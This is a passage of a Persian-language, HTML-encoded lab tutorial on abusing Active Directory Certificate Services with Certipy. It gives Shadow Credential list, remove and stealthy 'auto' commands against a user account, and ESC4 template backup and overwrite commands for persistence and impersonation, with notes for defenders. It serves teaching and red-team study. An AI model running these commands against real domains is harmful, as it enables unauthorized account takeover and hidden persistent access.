                    \n\u062a\u0646\u0647\u0627 \u0631\u0627\u0647 \u0648\u0627\u0642\u0639\u06cc \u0628\u0631\u0627\u06cc \u0644\u063a\u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0647\u0627\u062c\u0645\u060c \u062d\u0630\u0641 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u06cc\u0646 Credential\u0647\u0627 \u0627\u0633\u062a\u060c \u0648 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0627\u0647\u0645\u06cc\u062a \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0631\u0627\u06cc \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc \u062f\u0648\u0686\u0646\u062f\u0627\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
                    \u0628\u0631\u0631\u0633\u06cc \u0648 \u062d\u0630\u0641<\/strong> Shadow Credential<\/strong>\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 \u062f\u0631 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc<\/strong><\/span><\/p>\n
                    \u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0647\u06cc\u0686 \u0634\u0646\u0627\u0633\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 (Device ID) \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc shivam \u0645\u062a\u0635\u0644 \u0627\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631. \u0627\u06af\u0631 \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c \u0628\u0627 \u062f\u0633\u062a\u0648\u0631 \u0628\u0639\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0622\u0646 \u0631\u0627 \u062d\u0630\u0641 \u06a9\u0631\u062f.<\/span><\/p>\n
                    \u06af\u0627\u0645 \u0627\u0648\u0644: \u0641\u0647\u0631\u0633\u062a<\/strong> Device ID<\/strong>\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 <\/strong>msDS-KeyCredentialLink<\/strong><\/span><\/p>\n
                    certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam list<\/span><\/pre>\n
                    \u06af\u0627\u0645 \u062f\u0648\u0645: \u062d\u0630\u0641 \u0634\u0646\u0627\u0633\u0647 \u062e\u0627\u0635 \u0627\u0632 \u062d\u0633\u0627\u0628<\/strong> shivam<\/strong><\/span><\/p>\n
                    certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id d867fd89-9bf7-6831-fc13-adf40d60b014 remove<\/span><\/pre>\n
                    \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c Shadow Credential \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 \u0631\u0627 \u0627\u0632 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u06cc \u062d\u0630\u0641 \u06a9\u0627\u0645\u0644 \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u0644\u0627\u06af\u06cc\u0646 \u0628\u062f\u0648\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 shivam \u0627\u0633\u062a.<\/span><\/p>\n
                    \u062a\u0623\u06cc\u06cc\u062f \u062d\u0630\u0641 \u0645\u0648\u0641\u0642<\/strong><\/span><\/p>\n
                    \u0627\u06af\u0631 \u062f\u0633\u062a\u0648\u0631 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u062c\u0631\u0627 \u0634\u0648\u062f\u060c \u0628\u0647\u200c\u0645\u0639\u0646\u0627\u06cc \u062d\u0630\u0641 \u0646\u0647\u0627\u06cc\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u06cc\u0646 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u0633\u062a \u0648 \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u062d\u0627\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062f\u06cc\u06af\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (Certificate-based Auth) \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f.<\/span><\/p>\n
                    \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u062c\u0632\u0626\u06cc \u06a9\u0644\u06cc\u062f\u06cc \u062f\u0631 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u0648 \u0627\u062d\u06cc\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0646\u0641\u0648\u0630 \u0627\u0633\u062a \u0648 \u0628\u0627\u06cc\u062f \u062f\u0631 \u0686\u06a9\u200c\u0644\u06cc\u0633\u062a\u200c\u0647\u0627\u06cc Incident Response \u0648 \u062a\u062d\u0644\u06cc\u0644\u200c\u0647\u0627\u06cc Forensics \u06af\u0646\u062c\u0627\u0646\u062f\u0647 \u0634\u0648\u062f.<\/span><\/p>\n
                    \"\"<\/span><\/p>\n
                    \u0627\u062c\u0631\u0627\u06cc \u062e\u0648\u062f\u06a9\u0627\u0631: \u0627\u0641\u0632\u0648\u062f\u0646 <\/strong>\u2192<\/strong> \u0627\u0633\u062a\u0641\u0627\u062f\u0647 <\/strong>\u2192<\/strong> \u062d\u0630\u0641 (\u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0645\u0648\u0642\u062a\u06cc)<\/strong><\/span><\/p>\n
                    \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u06cc\u06a9 \u0642\u0627\u0628\u0644\u06cc\u062a \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u06cc \u0627\u0628\u0632\u0627\u0631 Certipy \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062f\u0631 \u06cc\u06a9 \u062f\u0633\u062a\u0648\u0631 \u0648\u0627\u062d\u062f:<\/span><\/p>\n
                      \n
                    1. \u06cc\u06a9 Shadow Credential \u0645\u0648\u0642\u062a \u0628\u0647 \u062d\u0633\u0627\u0628 \u0647\u062f\u0641 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u062f\u060c<\/span><\/li>\n
                    2. \u0628\u0644\u0627\u0641\u0627\u0635\u0644\u0647 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u062f (\u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631)\u060c<\/span><\/li>\n
                    3. \u0633\u067e\u0633 \u0641\u0648\u0631\u0627\u064b \u0622\u0646 Credential \u0631\u0627 \u067e\u0627\u06a9 \u06a9\u0646\u062f\u060c \u0637\u0648\u0631\u06cc \u06a9\u0647 \u0647\u06cc\u0686 \u0631\u062f\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0642\u06cc \u0646\u0645\u0627\u0646\u062f.<\/span><\/li>\n<\/ol>\n
                      certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam auto<\/span><\/pre>\n
                      \u0634\u0631\u062d \u0639\u0645\u0644\u06a9\u0631\u062f<\/strong>:<\/strong><\/span><\/p>\n
                        \n
                      • \u0627\u0641\u0632\u0648\u062f\u0646 (Add): \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u0645\u0648\u0642\u062a\u06cc \u0628\u0647 msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 shivam \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n
                      • \u0627\u0633\u062a\u0641\u0627\u062f\u0647 (Use): \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 PKINIT (\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0631 \u0627\u0633\u0627\u0633 \u06af\u0648\u0627\u0647\u06cc) \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0644\u0627\u06af\u06cc\u0646 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n
                      • \u062d\u0630\u0641 (Remove): \u06a9\u0644\u06cc\u062f \u0628\u0644\u0627\u0641\u0627\u0635\u0644\u0647 \u067e\u0633 \u0627\u0632 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u067e\u0627\u06a9 \u0645\u06cc\u200c\u0634\u0648\u062f \u062a\u0627 \u0647\u06cc\u0686 \u0627\u062b\u0631\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0642\u06cc \u0646\u0645\u0627\u0646\u062f.<\/span><\/li>\n<\/ul>\n
                        \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong>:<\/strong><\/span>
                        \n\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u060c \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc\u06cc \u0627\u0632 \u067e\u0646\u0647\u0627\u0646\u200c\u06a9\u0627\u0631\u06cc (Stealth) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0648\u0642\u062a\u06cc\u060c \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u067e\u0627\u06cc\u062f\u0627\u0631 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f.<\/span>
                        \n\u0628\u0631\u0627\u06cc \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc\u060c \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0686\u0646\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a\u06cc \u0646\u06cc\u0627\u0632\u0645\u0646\u062f \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u067e\u06cc\u0634\u0631\u0641\u062a\u0647 \u0631\u0648\u06cc \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a msDS-KeyCredentialLink \u062f\u0631 \u0628\u0627\u0632\u0647\u200c\u0647\u0627\u06cc \u0632\u0645\u0627\u0646\u06cc \u06a9\u0648\u062a\u0627\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
                        \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9 \u0645\u062b\u0627\u0644 \u0648\u0627\u0642\u0639\u06cc \u0627\u0632 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0631 \u0633\u0637\u062d APT (\u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u067e\u0627\u06cc\u062f\u0627\u0631 \u067e\u06cc\u0634\u0631\u0641\u062a\u0647) \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0627\u06cc\u062f \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 (Red Team) \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647 \u0645\u0648\u0631\u062f \u0628\u0631\u0631\u0633\u06cc \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f.<\/span><\/p>\n
                        \"\"<\/span><\/p>\n
                        \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0648 \u06a9\u0646\u062a\u0631\u0644<\/strong> CA (Modifying Templates & CA)<\/strong><\/span><\/p>\n
                        \u067e\u0633 \u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0648\u0641\u0642 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc (Certificate-Based Access)\u060c \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0628\u0639\u062f\u06cc \u062d\u0645\u0644\u0647 \u0634\u0627\u0645\u0644 \u062a\u0633\u0644\u0637 \u06a9\u0627\u0645\u0644 \u0628\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0645\u0631\u062c\u0639 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (Certificate Authority) \u0627\u0633\u062a. \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647:<\/span><\/p>\n
                          \n
                        • \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0627\u0646\u0646\u062f ESC4 \u0631\u0627 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u06cc\u0645\u060c<\/span><\/li>\n
                        • \u062e\u0648\u062f \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 Certificate Officer \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645\u060c<\/span><\/li>\n
                        • \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0631\u0648\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u060c \u062b\u0628\u062a\u060c \u0648 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0645\u06cc\u200c\u0622\u0648\u0631\u06cc\u0645\u060c<\/span><\/li>\n
                        • \u0648 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0631\u0627 \u0628\u0647\u200c\u06af\u0648\u0646\u0647\u200c\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u0648 \u062e\u0648\u062f\u06a9\u0627\u0631\u0633\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062f\u0627\u0648\u0645 \u0648 \u0645\u0627\u0646\u062f\u06af\u0627\u0631 (Persistence) \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f.<\/span><\/li>\n<\/ul>\n
                          \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u06af\u0648\u0627\u0647\u06cc<\/strong> (Backup a Template Configuration)<\/strong><\/span><\/p>\n
                          \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC4 \u0631\u0627 \u062f\u0631 \u0642\u0627\u0644\u0628 \u0641\u0627\u06cc\u0644 JSON \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                          certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -save-configuration backup.json<\/span><\/pre>\n
                          \u06a9\u0627\u0631\u0628\u0631\u062f \u0641\u0646\u06cc<\/strong>:<\/strong><\/span><\/p>\n
                            \n
                          • \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 JSON \u0634\u0627\u0645\u0644 \u062a\u0645\u0627\u0645 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062c\u0627\u0631\u06cc \u0642\u0627\u0644\u0628 \u0627\u0633\u062a: \u0645\u0627\u0646\u0646\u062f EKU\u060c \u0645\u062c\u0648\u0632\u0647\u0627\u060c \u0633\u06cc\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u062b\u0628\u062a (Enrollment)\u060c \u0648 …<\/span><\/li>\n
                          • \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0646\u0633\u062e\u0647\u200c\u06cc \u0633\u0627\u0644\u0645 \u0642\u0627\u0644\u0628 \u062f\u0631 \u0635\u0648\u0631\u062a \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u060c<\/span><\/li>\n
                          • \u06cc\u0627 \u0622\u0646 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u067e\u0627\u06cc\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0645\u062e\u0631\u0628 \u062f\u0631 \u0622\u06cc\u0646\u062f\u0647 \u0646\u06af\u0647 \u062f\u0627\u0634\u062a.<\/span><\/li>\n<\/ul>\n
                            \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong>:<\/strong><\/span>
                            \n\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u06cc\u0627 \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0642\u0635\u062f \u062f\u0627\u0631\u062f \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u067e\u0646\u0647\u0627\u0646\u06cc \u0631\u0627 \u0628\u0631 \u0631\u0648\u06cc \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u062f \u0648\u0644\u06cc \u0628\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0647\u0631 \u0632\u0645\u0627\u0646 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u0627\u0648\u0644\u06cc\u0647 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f.<\/span>
                            \n\u0647\u0645\u0686\u0646\u06cc\u0646 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0622\u0628\u06cc (Blue Team) \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0627 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a JSON \u062f\u0631 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u060c \u0628\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0631\u0641\u062a\u0627\u0631\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9 \u0628\u067e\u0631\u062f\u0627\u0632\u0646\u062f.<\/span><\/p>\n
                            \u062f\u0631 \u0628\u062e\u0634\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0642\u0627\u0644\u0628 \u0631\u0627 \u0627\u0635\u0644\u0627\u062d (modify) \u06cc\u0627 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u062c\u062f\u062f (restore) \u06a9\u0646\u06cc\u0645 \u062a\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062e\u0648\u062f \u0631\u0627 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0631\u062f\u0647 \u06cc\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u0642\u0628\u0644 \u0628\u0631\u06af\u0631\u062f\u0627\u0646\u06cc\u0645.<\/span><\/p>\n
                            \"\"<\/span><\/p>\n
                            \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636<\/strong> (Overwrite with Default Configuration)<\/strong><\/span><\/p>\n
                            \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u06af\u0648\u0627\u0647\u06cc ESC4 \u0631\u0627 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 (Default Configuration) \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                            certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -write-default-configuration<\/span><\/pre>\n
                            \u06a9\u0627\u0631\u0628\u0631\u062f \u0641\u0646\u06cc<\/strong>:<\/strong><\/span><\/p>\n
                              \n
                            • \u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0642\u0627\u0644\u0628 \u0633\u062e\u062a\u200c\u0633\u0627\u0632\u06cc\u200c\u0634\u062f\u0647 (Hardened Template) \u0631\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0648\u06cc\u0646\u062f\u0648\u0632 \u0628\u0627\u0632\u0645\u06cc\u200c\u06af\u0631\u062f\u0627\u0646\u062f.<\/span><\/li>\n
                            • \u062f\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647\u060c \u0627\u06cc\u0646 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062d\u0630\u0641 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627 \u0648 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f:<\/span>\n
                                \n
                              • \u0627\u0645\u06a9\u0627\u0646 \u062a\u0646\u0638\u06cc\u0645 SAN (Subject Alternative Name) \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u062b\u0628\u062a\u200c\u0646\u0627\u0645\u200c\u06a9\u0646\u0646\u062f\u0647 (Enrollee-supplied SAN)\u060c<\/span><\/li>\n
                              • \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0633\u062a\u06cc\u060c<\/span><\/li>\n
                              • \u06cc\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0633\u0637\u062d \u067e\u0627\u06cc\u06cc\u0646 \u0628\u0647 \u0642\u0627\u0644\u0628.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
                                \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong>:<\/strong><\/span>
                                \n\u062f\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u0628\u06a9 ESC4\u060c \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0642\u0627\u0644\u0628 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0645\u062c\u062f\u062f\u0627\u064b \u0627\u0632 \u0647\u0645\u0627\u0646 \u0642\u0627\u0644\u0628 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062a\u0642\u0644\u0628\u06cc \u06cc\u0627 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f.<\/span>
                                \n\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0645\u0686\u0646\u06cc\u0646 \u062f\u0631 \u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0639\u0645\u0644\u06cc\u0627\u062a \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0628\u0631\u0627\u06cc \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0645\u0633\u06cc\u0631 \u0648\u0631\u0648\u062f \u0645\u062c\u062f\u062f (re-entry point) \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u0628\u06cc\u0627\u06cc\u06cc\u062f \u0646\u06af\u0627\u0647\u06cc \u0633\u0631\u06cc\u0639 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u0645 \u0628\u0647 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0645\u0631\u062c\u0639 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (Certificate Authority – CA) \u0648 \u0627\u06cc\u0646\u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u2014\u0645\u0627\u0646\u0646\u062f \u0645\u0648\u0627\u0631\u062f \u0645\u0634\u0627\u0647\u062f\u0647\u200c\u0634\u062f\u0647 \u062f\u0631 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc ESC1 \u0648 ESC4\u2014\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u06cc\u062c\u0627\u062f \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u0648 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0634\u0648\u0646\u062f.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u0627\u0639\u0645\u0627\u0644 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u062a\u063a\u06cc\u06cc\u0631\u06cc\u0627\u0641\u062a\u0647 \u06cc\u0627 \u062f\u0627\u0631\u0627\u06cc \u0628\u06a9\u200c\u062f\u064f\u0631<\/strong> (Backdoored Template)<\/strong><\/span><\/p>\n
